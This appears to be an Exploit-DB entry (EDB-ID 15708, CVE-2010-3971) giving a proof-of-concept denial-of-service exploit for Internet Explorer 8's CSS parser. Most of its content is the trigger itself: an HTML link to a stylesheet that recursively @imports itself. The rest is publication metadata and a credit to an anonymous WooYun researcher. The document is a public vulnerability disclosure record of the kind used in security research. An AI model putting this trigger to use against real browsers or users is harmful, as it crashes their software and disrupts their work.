Microsoft Internet Explorer 8 - CSS Parser Denial of Service

EDB-ID: 15708 CVE: 2010-3971 OSVDB-ID: 69796
Verified: Author: WooYun Published: 2010-12-08
Download Exploit: Source Raw Download Vulnerable App: N/A
<div style="position: absolute; top: -999px;left: -999px;">
<link href="css.css" rel="stylesheet" type="text/css" />

<code of css.css>
@import url("css.css");
@import url("css.css");
@import url("css.css");
@import url("css.css");

Exploit-DB Notes:
* Original credit goes to an unidentified researcher using WooYun anonymous account "路人甲".
WooYun is a connection platform for vendors and security researchers:

* Dec 22, 2010 - Microsoft releases security advisory for this vulnerability: